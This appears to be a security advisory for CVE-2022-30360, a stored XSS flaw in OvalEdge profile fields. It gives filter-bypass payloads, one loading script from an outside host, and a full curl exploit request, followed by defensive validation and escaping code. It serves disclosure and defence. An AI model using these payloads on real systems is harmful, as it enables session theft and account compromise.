
Stored XSS

OvalEdge 5.2.8.0 and earlier is affected by Stored XSS (AKA Persistent or Type II) vulnerabilities.

Stored XSS (authenticated)

CVE-2022-30360

OvalEdge 5.2.8.0 and earlier is affected by multiple Stored XSS (AKA Persistent or Type II) vulnerabilities via a POST request to /profile/updateProfile via the slackid or phone parameters. Authentication is required.

Here are two examples that bypass the latest XSS patch:

 </span> <script src="//xss.qa"/>
 </span> <script > alert ('xss');</script >

Note the use of a space at the beginning of the XSS strings. Exploitation is limited to 50 characters.

Example CURL Request

curl -k 'https://example.com/ovaledge/profile/updateProfile' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykZH2TqJk3RBgZVKN' \
  -H 'Cookie: oe-loc=en; JSESSIONID=NzA2ZTg2YjUtYmE2OS00MTZiLTllZmItNTIzZGUxZmRmYjUy' \
  -H 'Origin: https://example.com' \
  -H 'Referer: https://example.com/ovaledge/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw $'------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="fname"\r\n\r\nAdmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="lname"\r\n\r\nOvalEdge\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="email"\r\n\r\nadmin@ovaledge.com\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="phone"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="slackid"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="picture"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="stackId"\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="userId"\r\n\r\nadmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN--\r\n' \
  --compressed
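As a defender-side counterpart to the payloads above, here is an added Python example (not OvalEdge's code; the vendor's actual patch is not shown on this page) that contrasts a constructed denylist filter, which whitespace variants such as `<script >` slip past, with anchored allow-list validation for the two affected fields plus HTML output encoding. The phone and slackid formats are assumptions, not the product's documented rules.

```python
import html
import re

# Constructed allow-lists for the two fields named in the advisory (assumption:
# the product's real field formats are not documented on this page).
PHONE_RE = re.compile(r"^\+?[0-9][0-9 ().-]{4,18}$")
SLACKID_RE = re.compile(r"^[A-Za-z0-9._-]{1,50}$")


def naive_denylist_filter(value: str) -> str:
    """Constructed illustration of a denylist (NOT the vendor's patch): it strips
    exact tag spellings only, so '<script >' and '</script >' survive untouched."""
    for bad in ("<script>", "</script>", "<script src="):
        value = value.replace(bad, "")
    return value


def validate_profile_fields(fields: dict) -> dict:
    """Allow-list check; returns field -> reason for every rejected value.

    fullmatch() anchors the pattern, so the leading space the advisory
    relies on is itself enough to reject the payloads."""
    errors = {}
    phone = fields.get("phone", "")
    slackid = fields.get("slackid", "")
    if phone and not PHONE_RE.fullmatch(phone):
        errors["phone"] = "must be a phone number: digits, optional leading +, spaces, ().-"
    if slackid and not SLACKID_RE.fullmatch(slackid):
        errors["slackid"] = "must be 1-50 letters, digits, '.', '_' or '-'"
    return errors


def render_profile_card(fields: dict) -> str:
    """Defence in depth: HTML-encode every stored value at the point it is
    written into an HTML context, regardless of what validation let through."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(str(v), quote=True)}</td></tr>"
        for k, v in fields.items()
    )
    return f"<table>{rows}</table>"
```

Rejecting at the boundary and encoding at the sink are independent controls; the second one is what keeps a value that reached storage before the fix from executing when it is rendered.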
